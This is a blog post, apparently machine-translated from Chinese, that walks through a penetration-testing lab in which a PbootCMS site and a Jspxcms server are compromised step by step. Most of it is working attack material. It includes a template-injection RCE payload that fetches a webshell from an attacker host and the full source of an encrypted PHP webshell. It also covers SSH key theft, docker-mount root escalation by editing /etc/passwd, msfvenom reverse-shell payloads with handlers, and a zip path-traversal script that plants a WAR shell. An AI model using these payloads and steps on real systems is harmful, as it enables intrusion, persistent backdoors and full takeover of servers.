Dark moon penetration actual shooting range - item 8

Posted by yaatra on Fri, 11 Feb 2022 21:10:45 +0100

Dark moon penetration actual shooting range - item 8

Environment construction

Network card design

What needs to be prepared are three network cards, the NAT mode network card provided by the virtual machine, and two self added 19 and 18 network cards in host mode only

Topological graph

Specific topologies of the two practical projects

password

00x1 - Information Collection

Port scan

masscan

sudo masscan -p 1-65535 192.168.1.136 --rate=1000

See the typical 8888 port and 22 and 80 ports

Try to access

8888

nmap

sudo nmap -p 22,80,888,8888,3306,21 -sS -sC -v -A 192.168.1.136 -oA 136

Bind domain name

Bind the domain name according to the prompt

binding

Determine cms for external network management – pbootcms

00x2 external network management

cms penetration idea

Determine the cms version, check the upgrade instructions, especially the vulnerability announcement, and then compare the files to locate the vulnerabilities and analyze the vulnerabilities and patches

Version determination

I:

Generally, it is a simple information collection of the website, viewing the information of the website, and possibly obtaining some version information of the website

2: View web pages using the catalog scan tool

3: Download the source code audit of the website, see if there is any content about the web page in the source code, and then visit

We use the second way

Method 3:

Download source code audit (download the latest version directly on the official website)

We can see the txt text of changelog in the doc folder

visit

The result is the same as version 2.0.8

Vulnerability search

Also, check the upgrade log information of 2.0.9 on the official website

It did not specify security vulnerabilities

Directory scan

In the above, when we use the directory scanning tool, we find that there may be backup files

Using dirsearch

python3 dirsearch.py -u http://www.cf1.com/ -e * -w db/xl.txt

The results are not good. Let's write a scanning tool

import requests

# Scan address
url1 = "http://www.cf1.com/"

# Common website source code backup file name
dir1 = ['web','website','backup','back','www','wwwroot','temp','config']

# Common website source code backup file suffix
final2 = ['tar','tar.gz','zip','rar','bak']

# Start scanning
for i in dir1 :
    for j in final2 :
        # Splice backup file name
        filename = str(i) + '.' + str(j)
        # Splice final url
        url = str(url1) + '/' + filename

        # Return file name
        print(filename + '  ',end='')

        # Return the length of the data packet, and judge the backup file of the website according to the length
        print(len(requests.get(url).text))

result

Backup files found

Some configuration information

At the same time, it is found that pboot CMS uses sqlite database

Attempt to access database file

Open database

decrypt

pay

Find again

The first nine digits of a

admin****

Log in directly to the background

Direct use of online explosion

Background RCE

Using payload

{pboot:if(implode('', ['c','a','l','l','_','u','s','e','r','_','f','u','n','c'])(implode('',
['p','h','p','i','n','f','o'])))}!!!{/pboot:if}

In the site information of the website background, you can directly modify the foreground index PHP file

Visit the home page again

It shows that there are rce vulnerabilities

Make payload

The above statement can be executed successfully, but the following attempt to write a sentence is wrong, and the written file cannot be executed

{pboot:if(implode('', ['c','a','l','l','_','u','s','e','r','_','f','u','n','c'])(implode('',['eval($_GET[cmd])'])))}!!!{/pboot:if}



eval($_GET[cmd])

But we can't write the horse directly. We can use file when setting the blacklist_ get_ Connect() function

{pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['like','.php']),implode('',['<?phpfile_','put_','contents(','"like4h.php",','file','_get_','contents("','http://192.168.1.130/shell.txt"))?>'])))}!!!{/pboot:if}

Because the implode function can be used and the characteristics of array can be used, we can use file_ put_ The connect function writes files

About file_ put_ Connect() can also continue to use arrays

Generated payload

{pboot:if(implode('',['f','i','l','e','_','p','u'.'t','_c','o','n','t','e','n','t','s'])(implode('',['like','.php']),implode('',['<?phpfile_','put_','contents(','"like4h.php",','file','_get_','contents("','http://192.168.1.130/shell.txt"))?>'])))}!!!{/pboot:if}

Use first file_put_contents Function write like4.php The contents of the file and the written contents are the contents of the following array:
<?php file_put_contents("like4h.php",file_get_contents("http://192.168.1.130/shell.txt"))?>

Then visit like4.php A file will be generated in the directory like4h.php Documents

1.txt The content of is all kinds of horses we write ourselves
 Ice scorpions are used here

horse

<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //The key is the first 16 bits of the 32-bit md5 value of the connection password, and the default connection password is rebeyond
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

generate

No error is reported or displayed, indicating that the writing is successful

connect

On the last pony, it is convenient to use the ant sword

Horses with d shields are used here

connect

Take webshell

bypass_disablefunc

Try to execute the command when you win the weh shell, but there is a disablefunc function

Try using the ant sword

We already know the version of php

Using plug-ins

Execute to get shell

00x3 tear

Upgrade permissions

The wehshell I just got is the permission of www, which is too low

Upgrade permissions

Try using the commonly used: bypass_disablefunc_via_LD_PRELOAD-master

Can upload

Upgrade permissions, try to use

Fruitless

Back to shell

Continue to return to the shell obtained above and view some user information

View basic information

(www:/www/wwwroot/www.cf1.com) $ ifconfig               #Two network cards
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:cc:5b:77:44  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.136  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20c:29ff:fe75:7078  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:75:70:78  txqueuelen 1000  (Ethernet)
        RX packets 1066486  bytes 1247936317 (1.2 GB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 407823  bytes 35915903 (35.9 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1669  bytes 145765 (145.7 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1669  bytes 145765 (145.7 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        

(www:/www/wwwroot/www.cf1.com) $ cat /etc/passwd         #View basic user information
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
cf1:x:1000:1000:CF1,,,:/home/cf1:/bin/bash                             #Users found
smmta:x:122:127:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:123:128:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin
www:x:1001:1001::/home/www:/sbin/nologin
mysql:x:1002:1002::/home/mysql:/sbin/nologin
sshd:x:124:65534::/run/sshd:/usr/sbin/nologin


When scanning the port above, we found that the target machine is open 22 ssh Port, view sshd configuration information

(www:/www/wwwroot/www.cf1.com) $ cat /etc/ssh/sshd_config      #View sshd configuration information
#    $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $
# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.
# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin
# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.
#Port 22                                                  #port information
#AddressFamily any allows other ip connections
#ListenAddress 0.0.0.0
#ListenAddress ::
#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key
# Ciphers and keying
#RekeyLimit default none
# Logging
#SyslogFacility AUTH
#LogLevel INFO
# Authentication:
#LoginGraceTime 2m
#PermitRootLogin prohibit-password            #root login is not allowed
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10
#PubkeyAuthentication yes                    #Discovery can be logged in through the public key
# Expect .ssh/authorized_keys2 to be disregarded by default in future.
#AuthorizedKeysFile    .ssh/authorized_keys .ssh/authorized_keys2
#AuthorizedPrincipalsFile none
#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes                #Allow login with password
#PermitEmptyPasswords no
# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no
# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
# no default banner path
#Banner none
# Allow client to pass locale environment variables
AcceptEnv LANG LC_*
# override default of no subsystems
Subsystem    sftp    /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
#    X11Forwarding no
#    AllowTcpForwarding no
#    PermitTTY no
#    ForceCommand cvs server



determine ssh Key login settings for
3. set up SSH´╝îTurn on key login function
 edit /etc/ssh/sshd_config File, set as follows:

RSAAuthentication yes
PubkeyAuthentication yes
 In addition, please pay attention root Can users pass SSH Sign in:

PermitRootLogin yes
 Disable password login after you complete all settings and successfully log in as a key:

PasswordAuthentication no
 Finally, restart SSH Services:

[root@host .ssh]$ service sshd restart


The discovery target can be used for key login

Find key

Generally, when the command is executed to generate the key, we operate in the user's home directory, so we generally check the directory file first

Copy key

Connect to the target machine via ssh

ssh -i id_rsa cf1@192.168.1.136

View user information

groups
id

Dockers exist on the target machine
test

There is indeed a docker

00x4 - lifting right extranet target machine

Above, we know that docker exists in the target machine. If the right is raised, we can directly use the way of docker root to raise the right

reference resources
https://blog.csdn.net/weixin_46700042/article/details/109532502

Upper means

Determine whether to connect to the Internet

Open whole

Pull image
docker pull alpine
 Execute mirrored file
docker run -v /etc:/mnt -it alpine

Go to the corresponding directory of the host
cd /mnt

Generate user name and password format file
openssl passwd -1 --salt like4h      password:123456
$1$like4h$JwJbrYKAxFDTfC5uBdzOj/

to passwd Add user information
vi /mnt/etc/passwd

like4h:$1$like4h$JwJbrYKAxFDTfC5uBdzOj/:0:0::/root:/bin/bash

Go back to the host and log in
exit

su like4h
123456


process
View the file contents of the host in the docker container

Generate user name and password format file

Add user information to passwd

Go back to the host and log in

Launch MSF and CS

Generate attack payload

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=9010 -f elf > /home/kali/Desktop/fbi/cf1/cf1re

upload

Set listener

use multi/handler
set payload linux/x86/meterpreter/reverse_tcp
show options 
set lhost 0.0.0.0
set lport 9010
run

Execute online

Set CS Online

Set crossc2

Show down

00x-5 other hosts found

Ubuntu host information collection

Network card information, router information

nmap scan other hosts

sudo nmap -sS 192.168.1.0/24

In fact, it's better to install an nmap on the target machine

apt  install nmap
nmap -sn -T4 192.168.0/24

Use nmap for detailed detection

nmap -sS -A 192.168.1.124

Port 8080 is open and has a website. It should be built by tomcat

Windows server 2012

Other target machines found

Direct access

Vulnerability search

The vulnerabilities found are all the vulnerabilities of the background getshell and login attempts

Password direct blasting

Password 123456

Background RCE reproduction

Jspxcms background zip decompression function directory traversal vulnerability causes getshell
reference resources
https://blog.csdn.net/lastwinn/article/details/119303905
https://lockcy.github.io/2019/10/18/%E5%A4%8D%E7%8E%B0jspxcms%E8%A7%A3%E5%8E%8Bgetshell%E6%BC%8F%E6%B4%9E/
Prepare war script
jar.exe cf shell.war ma2.jsp

compress
import zipfile

if __name__ == "__main__":
    try:
        binary = open('shell.war','rb').read()   #File to compress (shell.war)
        zipFile = zipfile.ZipFile("like4h2.zip", "a", zipfile.ZIP_DEFLATED)   #Compressed file
        info = zipfile.ZipInfo("like4h2.zip")              #Compressed file
        zipFile.writestr("../../../shell.war", binary)     #Compressed file name
        zipFile.close()
    except IOError as e:
        raise e

Document content

Then put the compressed package into an empty folder for compression

upload

Upload successful, click unzip

Access CMD / CMD jsp

jsp successfully parsed and bypassed the verification of the website

Pony problem

Change horses
Try the fvenom attack directly
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.130 LPORT=8888 -f raw > /tmp/shell.jsp

encapsulation

Same as above

pack

Pack again

upload

visit

There is no error reported and the instructions can be implemented

Upper msf

The attack payload above is ready

Set listening
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.1.130
set lport 8888
set shell cmd.exe
exploit
Access attack payload

Successfully launched

Go to CS

Set listening
First msf Obtained on session Run in the background
background
 Then use exploit/windows/local/payload_inject To inject a new payload reach session in

Set new payload
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set LHOST 192.168.1.130    //cs host address
set LPORT 6    //Set the listening port at will, which needs to be consistent with cs
set session 1    //Set the meterpreter to be dispatched
set DisablePayloadHandler true    //Generation of a new handler is prohibited
fail

Write at the end

Welcome to join the planet and learn together. There are all kinds of red team resources, tools and tips!

Topics: Linux network security Web Security http